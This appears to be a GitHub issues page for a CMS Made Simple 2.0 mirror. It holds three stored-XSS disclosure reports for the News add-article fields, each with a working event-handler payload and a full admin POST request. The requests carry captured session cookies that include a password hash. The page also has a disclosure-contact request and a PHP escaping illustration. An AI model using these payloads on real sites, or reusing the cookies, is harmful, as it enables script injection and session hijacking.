cmsmadesimple / cmsmadesimple-2-0
Git mirror of the CMS Made Simple 2.0 rewrite
Home Page: http://cmsmadesimple.org
Locate: Content ----> News ----> add article
payload: 1" onmouseover=prompt(907460) bad="
Affected vector: m1_title
HTTP REQUEST:
POST /xxxx/cmsmadesimple/admin/moduleinterface.php HTTP/1.1
Host: xx.x.x.x:xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxxx/
Cookie: f55ebee232b88b67cd99413f20352285598849e9=aca0ec9499b6bace5485207d2293ec7d4c8ac7b6%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkTHF2SmZlMkxZc1BkSTVOXC93VG9ENWVSLnViZUhtNWRIXC9tM09NV25nRVFpeEQwc1pMV2Q0VyJ9; __c=a495fd1cd9688c4db3b; wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; CMSSESSID6b00d7ad8410=748fa0afe4dae55db5840c9a6855d3cd; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1539318259; Hm_lpvt_f6f37dc3416ca514857b78d0b158037e=1539318259
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1960545627
Content-Length: 2786
----------1960545627
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
----------1960545627
Content-Disposition: form-data; name="__c"
a495fd1cd9688c4db3b
----------1960545627
Content-Disposition: form-data; name="m1_title"
dinakaran1" onmouseover=prompt(907460) bad="
----------1960545627
Content-Disposition: form-data; name="m1_category"
1
----------1960545627
Content-Disposition: form-data; name="m1_summary"
ssss
----------1960545627
Content-Disposition: form-data; name="m1_content"
sss
----------1960545627
Content-Disposition: form-data; name="m1_status"
published
----------1960545627
Content-Disposition: form-data; name="m1_news_url"
slugform
----------1960545627
Content-Disposition: form-data; name="m1_extra"
informative
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_searchable"
1
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Month"
04
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Day"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Year"
2019
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Second"
36
----------1960545627
Content-Disposition: form-data; name="preview_template"
24
----------1960545627
Content-Disposition: form-data; name="preview_returnid"
-1
----------1960545627
Content-Disposition: form-data; name="m1_submit"
Submit
----------1960545627--
Hey there!
I belong to an open source security research community, and a member (@mdakh404) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Locate: Content ----> News ----> add article
payload: 1" onmouseover=prompt(907460) bad="
Affected vectors: m1_extra
HTTP REQUEST:
POST /suganya/cmsmadesimple/admin/moduleinterface.php HTTP/1.1
Host: xx.x.x.x:xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxxx/
Cookie: f55ebee232b88b67cd99413f20352285598849e9=aca0ec9499b6bace5485207d2293ec7d4c8ac7b6%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkTHF2SmZlMkxZc1BkSTVOXC93VG9ENWVSLnViZUhtNWRIXC9tM09NV25nRVFpeEQwc1pMV2Q0VyJ9; __c=a495fd1cd9688c4db3b; wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; CMSSESSID6b00d7ad8410=748fa0afe4dae55db5840c9a6855d3cd; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1539318259; Hm_lpvt_f6f37dc3416ca514857b78d0b158037e=1539318259
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1960545627
Content-Length: 2786
----------1960545627
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
----------1960545627
Content-Disposition: form-data; name="__c"
a495fd1cd9688c4db3b
----------1960545627
Content-Disposition: form-data; name="m1_title"
dinakaran
----------1960545627
Content-Disposition: form-data; name="m1_category"
1
----------1960545627
Content-Disposition: form-data; name="m1_summary"
ssss
----------1960545627
Content-Disposition: form-data; name="m1_content"
sss
----------1960545627
Content-Disposition: form-data; name="m1_status"
published
----------1960545627
Content-Disposition: form-data; name="m1_news_url"
Slugform
----------1960545627
Content-Disposition: form-data; name="m1_extra"
informative1" onmouseover=prompt(907460) bad="
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_searchable"
1
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Month"
04
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Day"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Year"
2019
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Second"
36
----------1960545627
Content-Disposition: form-data; name="preview_template"
24
----------1960545627
Content-Disposition: form-data; name="preview_returnid"
-1
----------1960545627
Content-Disposition: form-data; name="m1_submit"
Submit
----------1960545627--
In the install text file, it expects that /tmp/ and /tmp/templates_c/ directories will exist to begin with, but they do not (as you learn when you get to the install step).
(perhaps this is because they're empty directories that haven't been added to the git repository?)
Locate: Content ----> News ----> add article
payload: 1" onmouseover=prompt(907460) bad="
Affected vectors: m1_news_url
HTTP REQUEST:
POST /XXXXX/cmsmadesimple/admin/moduleinterface.php HTTP/1.1
Host: xx.x.x.x:xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxxx/
Cookie: f55ebee232b88b67cd99413f20352285598849e9=aca0ec9499b6bace5485207d2293ec7d4c8ac7b6%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkTHF2SmZlMkxZc1BkSTVOXC93VG9ENWVSLnViZUhtNWRIXC9tM09NV25nRVFpeEQwc1pMV2Q0VyJ9; __c=a495fd1cd9688c4db3b; wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; CMSSESSID6b00d7ad8410=748fa0afe4dae55db5840c9a6855d3cd; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1539318259; Hm_lpvt_f6f37dc3416ca514857b78d0b158037e=1539318259
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1960545627
Content-Length: 2786
----------1960545627
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
----------1960545627
Content-Disposition: form-data; name="__c"
a495fd1cd9688c4db3b
----------1960545627
Content-Disposition: form-data; name="m1_title"
Dinakaran
----------1960545627
Content-Disposition: form-data; name="m1_category"
1
----------1960545627
Content-Disposition: form-data; name="m1_summary"
ssss
----------1960545627
Content-Disposition: form-data; name="m1_content"
sss
----------1960545627
Content-Disposition: form-data; name="m1_status"
published
----------1960545627
Content-Disposition: form-data; name="m1_news_url"
slugform1" onmouseover=prompt(907460) bad="
----------1960545627
Content-Disposition: form-data; name="m1_extra"
Informative
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_searchable"
1
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Month"
04
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Day"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Year"
2019
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Second"
36
----------1960545627
Content-Disposition: form-data; name="preview_template"
24
----------1960545627
Content-Disposition: form-data; name="preview_returnid"
-1
----------1960545627
Content-Disposition: form-data; name="m1_submit"
Submit
----------1960545627--
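The three News reports on this page (m1_title, m1_extra, m1_news_url) submit the same payload shape: a double quote followed by an event-handler attribute. The PHP below is an added illustration, not CMS Made Simple code and not part of any report; the function names and the `<input>` markup are assumptions, on the premise that the field value is echoed back into a double-quoted HTML attribute. It renders the reported m1_title value with and without attribute encoding and lists the attributes an HTML parser ends up seeing.

```php
<?php
// Added illustration; not CMS Made Simple code. Function names are hypothetical.

// Constructed sample: the m1_title value taken from the report on this page.
$title = 'dinakaran1" onmouseover=prompt(907460) bad="';

// Vulnerable pattern (assumed): value concatenated into a double-quoted attribute.
function render_unescaped(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened: encode for the HTML attribute context at output time.
function render_escaped(string $name, string $value): string
{
    $enc = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="' . $enc($name) . '" value="' . $enc($value) . '">';
}

// Parse the markup and return the attribute names the <input> element carries.
function input_attributes(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // suppress parser warnings
    $doc->loadHTML($html);
    libxml_clear_errors();
    $names = [];
    $input = $doc->getElementsByTagName('input')->item(0);
    foreach ($input->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

$cases = [
    'unescaped' => render_unescaped('m1_title', $title),
    'escaped'   => render_escaped('m1_title', $title),
];
foreach ($cases as $label => $html) {
    $attrs    = input_attributes($html);
    // Any attribute whose name starts with "on" is an injected event handler.
    $handlers = array_values(array_filter($attrs, fn($a) => stripos($a, 'on') === 0));
    printf("%-9s attrs=[%s] event handlers=[%s]\n",
        $label, implode(',', $attrs), implode(',', $handlers));
}
```

The same encoding has to be applied wherever the stored title, extra and URL values are written back into markup, not only on the add-article form.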